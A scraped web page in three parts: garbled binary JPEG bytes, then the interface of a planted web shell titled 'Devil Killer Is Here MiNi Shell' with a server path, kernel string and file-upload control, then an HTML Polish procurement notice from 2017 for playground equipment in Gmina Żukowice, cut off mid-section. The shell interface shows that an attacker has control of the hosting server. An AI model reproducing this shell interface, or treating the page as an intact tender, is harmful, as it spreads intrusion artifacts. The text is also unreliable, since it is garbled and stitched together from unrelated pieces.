JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170210/23592-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.zukowice.pl' target='_blank'>http://www.bip.zukowice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 23592 - 2017
              z dnia 2017-02-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żukowice: Organizacja placów zabaw na terenie Gminy Żukowice<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Żukowice, krajowy numer identyfikacyjny
              39064738600000, ul.
              Żukowice 
              148,
              67231  
              Żukowice, woj.
              dolnośląskie, państwo
              Polska, tel.
              76 831 42 41, e-mail
              sekretarz@zukowice.pl, faks
              76 831 41 49.
              <br />
              Adres strony internetowej (URL): www.bip.zukowice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.zukowice.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.zukowice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />złożenie oferty w formie pisemnej<br />
                Adres:
                <br />Gmia Żukowice, Żukowice 14, 67-231 Żukowice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Organizacja placów zabaw na terenie Gminy Żukowice<br /><b>Numer referencyjny: </b>RGK.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa  wraz montażem wyposażenia do dwóch placów zabaw. Zamawiający dopuszcza możliwość składania ofert częściowych na niżej określone części.
1) Część I - Budowa placu zabaw w miejscowości Kłoda. Plac zabaw znajduje się na działce nr 269/1 w  miejscowości Kłoda, Gmina Żukowice. Teren jest ogrodzony i przygotowany do montażu nowych urządzeń na nawierzchni z piasku. Wymiar placu zabaw 13,9 m x 29,1 m. Do oferty należy dołączyć koncepcję rozmieszczenia  wskazana wizja w terenie (strefy bezpieczeństwa)  Zakres obejmuje wyposażenie placu zabaw w następujące urządzenia i elementy małej architektury:
a) Zestaw zabawowy. Urządzenie składające się z : dwóch kwadratowych zadaszonych wież z daszkami w kształcie ostrosłupów, pomostu z barierkami z lin stanowiącego przejście między wieżami, wejść na podesty w postaci drabinki łukowej oraz skośnej ścianki wspinaczkowej wyposażonej dodatkowo w linę asekuracyjną, przejścia tunelowego z wyższej wieży do ścianki wspinaczkowej, - zjazdu strażackiego. 
- Wymiary: 364 x 600 cm; strefa bezpieczeństwa: 711 x 905 cm; wysokość całkowita: 364 cm; wysokość podestu: 90, 140 cm; Wysokość swobodnego upadku: 150 cm.
- Konstrukcja - Stal (rury 88.9, 42.4, 33.7 mm), cynkowane, dwukrotnie malowane proszkowo.
- Ślizg - Stal nierdzewna, burty polietylen.
- Ścianki - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków   atmosferycznych.
- Dach - Tworzywo kompozytowe.
- Liny - Syntetyczne - 16 mm z rdzeniem stalowym.
- Tunel - Rura polietylenowa PE (630 mm).
- Podest, płyta wspinaczkowa - Antypoślizgowa płyta wodoodporna.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach. 
- Zaślepki rur - guma amortyzująca.
- Kotwienie - Zabetonowane 70 cm w gruncie.
b) Piaskownica sześciokątna.  Urządzenie składa się z: - sześciu ścianek o pofalowanej górnej krawędzi, sześciu mocujących słupków z rur, sześciu siedzisk mocowanych w narożnikach do słupków. Urządzenie składa się z: - sześciu ścianek o pofalowanej górnej krawędzi, sześciu mocujących słupków z rur, sześciu siedzisk mocowanych w narożnikach do słupków.
- Konstrukcja - Stal cynkowana, dwukrotnie malowana proszkowo.
- Ścianki, siedziska - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych   nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 50 cm w gruncie.
c) Huśtawka podwójna.  Urządzenie składa się z: - poprzeczki, czterech skośnych słupów podporowych, - czterech zawiesi, - dwóch siedzisk podwieszonych na łańcuchach (siedziska: 1xkubełkowe dla małych dzieci, 1x płaskie - deseczka). 
- Wymiary: 395 x 232 cm. 
- Strefa bezpieczeństwa: nawierzchnia sypka 315 x 750 cm; nawierzchnia syntetyczna 315 x 650 cm.; wysokość całkowita: 228 cm; wysokość swobodnego upadku: 128 cm.
- Konstrukcja - Stal cynkowana, dwukrotnie malowana proszkowo.
- Zawiesia - Stal nierdzewna z zestawem dwóch łożysk.
- Łańcuch - Łańcuch stalowy, cynkowany.
- Siedziska -  Siedzisko płaskie - deseczka oraz kubełkowe  konstrukcja aluminiowa oblana gumą, siedzisko gumowe - elastyczne  guma.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych  nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 70 cm w gruncie.
d) Huśtawka wagowa. Urządzenie składa się z: - poprzeczki z zamocowanymi dwoma siedziskami i dwoma uchwytami w kształcie pierścieni; - podstawy w kształcie dwóch trójkątów; - dwóch trójkątnych ścianek mocowanych do podstawy, mechanizmu obrotowy.
- Wymiary: 37 x 264 cm; strefa bezpieczeństwa: 260 x 500 cm; wysokość całkowita: 114 cm; wysokość swobodnego upadku: 99 cm.
- Konstrukcja - Stal cynkowana, dwukrotnie malowana proszkowo.
- Mechanizm obrotowy - Stalowy oparty na zestawie dwóch łożysk.
- Ścianki i siedziska - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 85 cm w gruncie.
e) Bujak konik. Urządzenie składa się z: - siedziska; - rączek i podpórek pod nogi; - korpusu w kształcie konika; - sprężyny; - ramy do kotwienia w gruncie. 
- Wymiary: 27 x 103 cm; strefa bezpieczeństwa: 327 x 415 cm; wysokość całkowita: 94 cm; wysokość swobodnego upadku: 50 cm.
- Rączki i podpórki po nóżki - Polietylen z rdzeniem stalowym.
- Rama do kotwienia - Stal cynkowana ogniowo.
- Siedzisko, korpus - płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych.
- Sprężyna - Stal sprężynowa, dwukrotnie malowana proszkowo.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 40 cm w gruncie.
f) Karuzela z kierownicą. Karuzela platformowa. Podstawa karuzeli oraz słup z kierownicą do kręcenia znajdujący się w osi, wykonane ze stali konstrukcyjnej, oczyszczonej w procesie piaskowania. Zabezpieczone przed korozją przez cynkowanie i malowanie proszkowe, farbami poliestrowymi odpornymi na promieniowanie UV. Poręcz stanowiąca jednocześnie oparcie wykonana ze stali nierdzewnej połączonej przy użyciu aluminiowych klamer. Siedzisko umieszczone na obwodzie karuzeli wykonane z płyty HPL. Platforma karuzeli płyta HPL z wyfrezowanymi rowkami w kształcie pajęczyny. 
- Wymiary urządzenia: 150 x 150 cm; wysokość 70 cm; strefa bezpieczeństwa 550 x 550 cm; maksymalna wysokość swobodnego upadku 70 cm.
g) Ławka  2 szt. Ławka składa się z: - dwóch stelaży pełniących jednocześnie funkcje podparcia bocznego; - siedziska; - oparcia.
- Wymiary: ok. 60 x 177 cm. Wysokość całkowita: ok. 80 cm. 
- Stelaże - Stal cynkowana, dwukrotnie malowana proszkowo.
- Siedzisko, oparcie - Drewno bezrdzeniowe  impregnowane.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.	
- Kotwienie - Zabetonowane 75 cm w gruncie.
h) Tablica regulaminowa. Tablica składa się z: - ramy w kształcie odwróconej litery U; - tablicy;
- Wymiary: ok. 42,4 x 68,5 cm; wysokość całkowita: ok. 200 cm.
- Rama - Stal cynkowana, dwukrotnie malowana proszkowo.
- Tablica - Blacha ocynkowana.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie war. zewn. nierdzewne,  od strony wewn. w plastikowych zaślepkach.
- Kotwienie -  Zabetonowane 60 cm w gruncie.
i) Kosz na śmieci  2 szt.  Kosz składa się z: - ramy w kształcie odwróconej litery U; - daszka;- kosza w kształcie walca z perforowaną ścianką o pojemności 35 l. 
- Wymiary: ok. 40 x 31 cm; wysokość całkowita: ok. 92 cm.
- Rama - Stal cynkowana, dwukrotnie malowana proszkowo.
- Kosz, daszek - Blacha stalowa cynkowana, dwukrotnie malowana proszkowo.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie  Zabetonowane 50 cm w gruncie.

2) Część II - Doposażenie placu zabaw w miejscowości Dobrzejowice. Plac zabaw znajduje się na  działce nr 189 w m. Dobrzejowice, Gmina Żukowice. Plac zabaw częściowo jest już wyposażony, należy dostosować nowy sprzęt do lokalizacji. Do oferty należy dołączyć koncepcję rozmieszczenia  wskazana wizja w terenie (strefy bezpieczeństwa). Zakres obejmuje wyposażenie placu zabaw w następujące urządzenia i elementy małej architektury:
a) Zestaw zabawowy, tj. urządzenie składające się z: dwóch kwadratowych zadaszonych wież z daszkami w kształcie ostrosłupów; pomostu z barierkami z lin stanowiącego przejście między wieżami; wejść na podesty w postaci drabinki łukowej oraz skośnej ścianki wspinaczkowej wyposażonej dodatkowo w linę asekuracyjną; przejścia tunelowego z wyższej wieży do ścianki wspinaczkowej - zjazdu strażackiego. 
- Wymiary: 364 x 600 cm; strefa bezpieczeństwa: 711 x 905 cm; wysokość całkowita: 364 cm; wysokość podestu: 90, 140 cm; wysokość swobodnego upadku: 150 cm.
- Konstrukcja - Stal (rury 88.9, 42.4, 33.7 mm), cynkowane, dwukrotnie malowane proszkowo.
- Ślizg - Stal nierdzewna, burty polietylen.
- Ścianki - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków   atmosferycznych.
- Dach - Tworzywo kompozytowe.
- Liny - Syntetyczne - 16 mm z rdzeniem stalowym.
- Tunel - Rura polietylenowa PE (630 mm).
- Podest, płyta wspinaczkowa - Antypoślizgowa płyta wodoodporna.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Zaślepki rur - guma amortyzująca.
- Kotwienie - Zabetonowane 70 cm w gruncie.
b) Ławka  1 szt. Ławka składa się z: - dwóch stelaży pełniących jednocześnie funkcje podparcia bocznego; - siedziska; - oparcia.
- Wymiary: ok. 60 x 177 cm; wysokość całkowita: ok. 80 cm. 
- Stelaże - Stal cynkowana, dwukrotnie malowana proszkowo.
- Siedzisko, oparcie - Drewno bezrdzeniowe  impregnowane
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych  nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.	
c) Ławka  2 szt. Ławka składa się z: - dwóch stelaży pełniących jednocześnie funkcje podparcia   Bocznego; - siedziska; - bez oparcia.
- Wymiary: ok. 60 x 177 cm; wysokość całkowita: ok. 80 cm. 
- Stelaże - Stal cynkowana, dwukrotnie malowana proszkowo.
- Siedzisko, oparcie - Drewno bezrdzeniowe  impregnowane
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.	

Urządzenia placu zabaw i małej architektury powinny posiadać odpowiednie certyfikaty i być osadzone w ziemi na prefabrykowanych betonowych elementach w sposób przewidziany przez producenta, w sposób gwarantujący bezpieczeństwo ich użytkowania. Wszystkie urządzenia powinny posiadać Certyfikat Zgodności z normami serii PN EN 1176:2009. Producent powinien zapewnić części zamienne oraz serwis pogwarancyjny. Urządzenia powinny być zamontowane z zachowaniem stref bezpieczeństwa wynikających z norm PN EN 1176;2008.
 W opisie  podano przykładowe urządzenia; dopuszcza się inne typy urządzeń pod warunkiem zachowania kompozycji i konstrukcji urządzeń, parametrów technicznych i materiałowych oraz stref bezpieczeństwa. Wizualizacja urządzeń oraz wizja w terenie. 

Uwaga:
Wykonawca przed złożeniem oferty zobowiązany jest do zapoznania się z zakresem robót na miejscu ich wykonania.

Wykonawca jest zobowiązany w cenie ofertowej uwzględnić wszystkie koszty niezbędne do prawidłowej realizacji zamówienia. 
Wszystkie materiały powinny być fabrycznie nowe, tzn. że żadna część składająca się na dany materiał nie może być wcześniej używana oraz winny posiadać niezbędne certyfikaty bezpieczeństwa, deklaracje zgodności i atesty dopuszczające do użytku, muszą odpowiadać wymaganiom zawartym w SIWZ jak również muszą być dopuszczone do obrotu i stosowania w krajach UE. Zamawiający informuje, że przedmiot zamówienia jest opisany w SIWZ przez wskazanie znaków towarowych, patentów lub pochodzenia wskazaniu takiemu towarzyszą wyrazy lub równoważny lub za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1 i 3 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Oferta równoważna to taka, która przedstawia przedmiot zamówienia o właściwościach funkcjonalnych i jakościowych takich samych lub zbliżonych do tych, które zostały określone w SIWZ, lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem, gwarantująca wykonanie zamówienia oraz zapewniająca uzyskanie nie gorszych parametrów technicznych. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty spełniają wymagania określone przez Zamawiającego.
Wykonawca zobowiązuje się do udzielenia gwarancji i rękojmi na przedmiot zamówienia na okres 5 lat od daty odbioru końcowego. <br /><br /><b>II.5) Główny kod CPV: </b>37535200-9<br /><b> Dodatkowe kody CPV:</b>45112723-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                20% wartości zamówienia podstawowego (art. 67 ust. 1 pkt 7).<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/05/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający uzna, że wykonawca spełnia warunek dotyczący posiadania kompetencji i uprawnień niezbędnych do wykonania przedmiotowego zamówienia wówczas, gdy wykażą się doświadczeniem polegającym na wykonaniu w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie, 2 wykonanymi dostawami polegającymi na dostawie urządzeń zabawowych wraz z montażem o łącznej wartości min. 30 000,00 zł. brutto 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na potwierdzenie spełniania warunku udziału w postępowaniu w zakresie sytuacji ekonomicznej wykonawca winien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200 000,00 zł.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                brak wymagań<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) oświadczenie wykonawcy o braku podstaw do wykluczenia z postępowania - (Załącznik nr 3);
2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
